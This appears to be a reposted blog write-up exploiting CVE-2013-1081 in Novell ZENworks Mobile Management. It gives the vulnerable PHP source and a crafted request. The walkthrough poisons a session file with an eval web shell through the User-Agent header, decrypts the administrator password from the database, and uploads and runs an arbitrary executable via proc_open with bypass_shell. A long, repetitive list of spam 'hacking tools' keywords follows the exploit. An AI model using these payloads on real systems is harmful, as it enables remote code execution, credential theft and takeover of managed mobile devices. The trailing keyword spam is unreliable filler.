2020. augusztus 23., vasárnap

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.


For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:
POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=
Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:
<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== ''  &&  $Language != $_SESSION["language"])
{
     //check for validity
     if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
     {
          $_SESSION["language"] = $Language;
     }
}

if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
In English:

  • Check if the "language" parameter is passed in on the request
  • If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
  • The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
  • If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
  • If the session variable "language" is set, include it into the page
  • Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
 /desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
 Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey']  > 0)
{

} else
{
     $_SESSION['$error'] = LOGIN_FAILED_TEXT;
     header('Location: index.php');

}
The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)


This will create a session file named "sess_payload" that we can include, the file contains the following:
 user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";
 Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:
return mdm_DecryptData($result[0]['Password']); 
Ends up it is magic – so I sent the following PHP to be executed on the server -
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);
 


Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));
This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.


After we have uploaded the file we can then carry out another request to execute what has been uploaded:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
     $output=explode("\\n",+stream_get_contents($pipes[1]));
     fclose($pipes[1]);
     proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};
The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:


Update: Metasploit modules are now available as part of metasploit.

Related word


  1. How To Hack
  2. Hack Tool Apk No Root
  3. Hacking Tools Mac
  4. Pentest Tools Website
  5. Github Hacking Tools
  6. Pentest Tools Kali Linux
  7. World No 1 Hacker Software
  8. Blackhat Hacker Tools
  9. Hacking Tools Mac
  10. Hacker Tools 2019
  11. Beginner Hacker Tools
  12. Pentest Recon Tools
  13. Pentest Tools For Windows
  14. Pentest Tools Android
  15. Wifi Hacker Tools For Windows
  16. Hackers Toolbox
  17. Pentest Tools For Windows
  18. Hacking Tools For Windows 7
  19. Hacker Tools Windows
  20. Pentest Tools For Windows
  21. Hacker Tools Free
  22. Hack Tools
  23. Pentest Tools Linux
  24. Hacking Tools For Windows 7
  25. Pentest Tools Windows
  26. Hackrf Tools
  27. Pentest Tools Windows
  28. Hacking Tools Windows
  29. Hacking Tools Download
  30. Pentest Tools Website Vulnerability
  31. Pentest Tools Nmap
  32. Hacker Search Tools
  33. Hacker Security Tools
  34. Hack Tools Github
  35. Hacking Tools For Beginners
  36. How To Make Hacking Tools
  37. Pentest Tools Website Vulnerability
  38. Pentest Tools Nmap
  39. Hack Tools Github
  40. Hacks And Tools
  41. Pentest Tools For Ubuntu
  42. Termux Hacking Tools 2019
  43. Hacker
  44. Hacking Tools Mac
  45. Pentest Tools Open Source
  46. Hacking Tools Online
  47. Pentest Tools Online
  48. Pentest Tools Port Scanner
  49. Hacker
  50. How To Install Pentest Tools In Ubuntu
  51. Free Pentest Tools For Windows
  52. Hack Tools For Games
  53. New Hacker Tools
  54. Hacking Apps
  55. Hacker Tools Linux
  56. Hack Tools For Pc
  57. Hacking Tools Pc
  58. Pentest Tools Windows
  59. Hacking Tools Online
  60. Ethical Hacker Tools
  61. Pentest Reporting Tools
  62. Nsa Hack Tools
  63. Pentest Tools Website Vulnerability
  64. Black Hat Hacker Tools
  65. Pentest Tools Github
  66. Computer Hacker
  67. Pentest Tools
  68. Pentest Tools
  69. Kik Hack Tools
  70. Hacking Tools For Mac
  71. Hacking Tools For Mac
  72. Hacker Tools Linux
  73. Pentest Tools List
  74. How To Install Pentest Tools In Ubuntu
  75. Tools For Hacker
  76. Pentest Tools
  77. Hak5 Tools
  78. Hack Tools 2019
  79. Hacking Tools For Pc
  80. Hackrf Tools
  81. Pentest Tools Framework
  82. Hack Tools For Windows
  83. Hacking Tools Github
  84. Blackhat Hacker Tools
  85. New Hacker Tools
  86. Hackers Toolbox
  87. Hacker Tools 2019
  88. Pentest Tools Apk
  89. Pentest Tools List
  90. Bluetooth Hacking Tools Kali
  91. Hacker Techniques Tools And Incident Handling
  92. Hacking Tools For Beginners
  93. Pentest Tools Free
  94. Pentest Automation Tools
  95. Hacker Tools Free Download
  96. Hack Tools Online
  97. Hak5 Tools
  98. Hacking Tools For Mac
  99. Hacker Tools Free Download
  100. Hacker Tools List
  101. Pentest Tools Framework
  102. Pentest Recon Tools
  103. Nsa Hacker Tools
  104. Pentest Automation Tools
  105. Hacker Tools
  106. Hacking Tools Usb
  107. Hacker Tools 2020
  108. Pentest Tools Bluekeep
  109. Hack Tools For Pc
  110. Hacker Tools Hardware
  111. Kik Hack Tools
  112. Hack Tools Online
  113. Hackers Toolbox
  114. Pentest Tools Apk
  115. Pentest Tools
  116. What Are Hacking Tools
  117. Hacker Hardware Tools
  118. Hacking Tools For Games
  119. Hack App
  120. Growth Hacker Tools
  121. Bluetooth Hacking Tools Kali
  122. Hacking Tools For Mac
  123. How To Hack
  124. How To Install Pentest Tools In Ubuntu
  125. Pentest Reporting Tools
  126. Hack Tool Apk No Root
  127. Pentest Tools Find Subdomains
  128. Pentest Tools Subdomain
  129. Pentest Tools For Windows
  130. Pentest Recon Tools
  131. Hacking Tools Windows
  132. Hack Tools Mac
  133. Ethical Hacker Tools
  134. Install Pentest Tools Ubuntu
  135. Pentest Tools For Android
  136. Pentest Tools Url Fuzzer
  137. Hacker Tools Apk Download
  138. Pentest Tools Bluekeep
  139. Pentest Tools
  140. Hacks And Tools